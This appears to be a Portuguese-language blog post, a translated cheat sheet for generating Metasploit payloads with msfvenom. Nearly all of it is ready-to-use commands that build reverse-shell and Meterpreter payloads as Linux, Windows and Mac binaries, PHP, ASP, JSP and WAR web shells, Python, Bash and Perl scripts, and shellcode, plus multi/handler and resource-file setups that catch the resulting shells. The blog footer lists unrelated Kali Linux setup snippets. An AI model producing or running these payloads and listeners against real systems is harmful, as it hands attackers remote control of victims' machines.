Pular para o conteúdo principal

Creating Metasploit Payloads

Criando Payloads Metasploit

Muitas vezes, um dos mais úteis (e para o iniciante subestimado) habilidades de Metasploit é o módulo msfpayload. Várias Payloads podem ser criados com este módulo e ajuda algo que pode dar-lhe uma Shell em quase qualquer situação. Para cada uma destes Payloads que você pode entrar no msfconsole e selecionar exploit/multi/handler. Roda ‘set payload’ para a o payload, utilizado e configurar todas as opções necessárias (LHOST, LPORT, etc). Executar e aguarde o payload para ser executado. Para os exemplos abaixo que é bastante auto-explicativo, mas LHOST deve ser preenchido com o seu endereço IP (LAN IP  Se atacando esta dentro da rede, WAN IP se atacando externamente), e LPORT deve ser a porta que você deseja ser ligado novamente.


Lista de payloads
# msfvenom -l

Busca especificada
# msfvenom -l | grep windows | grep reverse_tcp_dns

Binarios

Linux
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
# msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

PHP
# msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

Python
# msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
# msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
# msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

Para todos shellcode ver 'msfvenom -help-formatos' para obter informações quanto aos parâmetros válidos. Msfvenom exporta o código de saída que pode ser recortado e colado para seu exploit.

Linux Based Shellcode
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode
# msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers

Metasploit handlers pode ser configurado rapidamente no Metasploit para receber as suas shell de entrada. O handlers devem estar no seguinte formato.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Handlers em Resource
Copie e cole e salve como resource.rc

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Use:
# msfconsole -r  resource.rc -q
-r leitura do resource.rc
-q Sem Banner msfconsole, Opcional

Comentários

Postagens mais visitadas deste blog

pós-Instalação kali Linux - Instalando ARCH THEME

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 2 - Instalando ARCH THEME   Comando $ echo 'deb http://download.opensuse.org/repositories/home:/Horst3180/Debian_8.0/ /' >> /etc/apt/sources.list.d/arc-theme.list $ wget http://download.opensuse.org/repositories/home:Horst3180/Debian_8.0/Release.key $ apt-key add - < Release.key $ apt-get update $ apt-get install arc-theme Fonte: https://software.opensuse.org/download.html?project=home%3AHorst3180&package=arc-theme

pós-Instalação kali Linux - apt-get update && apt-get upgrade

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 1 - Atualização do sistema, segui o video abaixo: Informações extras gedit é o editor oficial de texto plano para o GNOME. Ele assemelha-se, a princípio, com o bloco de notas do Windows, mas observando os detalhes pode-se notar que possui mais recursos. Como por exemplo: Numeração de linhas. Fonte : https://pt.wikipedia.org/wiki/Gedit source.list : Um arquivo muito importante para o sistema APT de Debian é /etc/apt/sources.list. Neste arquivo são indicadas as fontes de onde serão obtidos os pacotes de software a serem instalados no sistema. Fonte : http://www.tutoriaisti.com.br/sistemas-operacionais/linux/debian-arquivos-sources-list/ source.list Kali Linux http://docs.kali.org/general-use/kali-linux-sources-list-repositories apt-get update - Atualiza a lista de pacotes e programas que podem ser insta...

pós-Instalação kali Linux - VLC error - Adobe FlashPlayer

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 4 - Corrigindo error VLC + Instalndo AdobeFlashPlayer Comando para o corrigir o VLC $ sed -i 's/geteuid/getppid/' /usr/bin/vlc Comando para AdobeFlashPlayer $ tar -xf flash_player_npapi_linux.x86_64.tar.gz $ ls $  mv  LGPL /usr/lib/mozilla/plugins/ $  mv  libflashplayer.so /usr/lib/mozilla/plugins/ $  mv  usr /usr/lib/mozilla/plugins/ $  ls /usr/lib/mozilla/plugins/ Reiniciar o navegador e Pronto